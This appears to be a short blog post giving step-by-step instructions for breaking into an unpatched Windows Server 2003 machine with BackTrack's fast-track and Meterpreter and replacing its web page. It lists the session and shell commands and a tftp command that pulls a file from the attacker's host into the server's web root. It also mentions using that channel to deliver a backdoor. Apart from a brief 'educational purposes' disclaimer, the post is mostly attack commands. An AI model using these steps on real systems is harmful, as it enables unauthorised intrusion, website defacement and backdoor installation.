This post is for educational purposes only and this bug has been patched by latest Microsoft patches.
A great hacking/exploration tool is called backtrack which is a linux distribution but more on that later...
Found a great video to get started: watch the video: http://uploads.blip.tv/file/576639
Basic instructions drawn for this and other videos - in this example; getting into the system with the purpose of adding a webpage to the target (in this case windows server 2003):
1. Log in to backtrack (startx for gui)
2. Start fast-track and choose exploit, enter IP and choose bind.
3. If there are sessions after the attack attempts then type:
sessions -i 1
Basic syntax:
sessions -i
4. To get to shell from meterpreter type:
execute -f cmd.exe -c -H -i
5. In another shell start BT tftp service, put your file to /tmp
6. Then get the file from the remote host (BT) in shell via tftp:
tftp -i 192.168.1.101 get /tmp/index.htm c:\inetpub\wwwroot\index.htm
syntax:
tftp -i
Note: it turns out that windows server 2003 service pack 1 and up has disabled tftp. So only SP0 will allow this trick. If you encounter those servers you must use another method or start tftp in some manner to transfer the backdoor or whatever you want. In my case I simply used echo to type a sample text into a file created by the command, I called index.html
No comments:
Post a Comment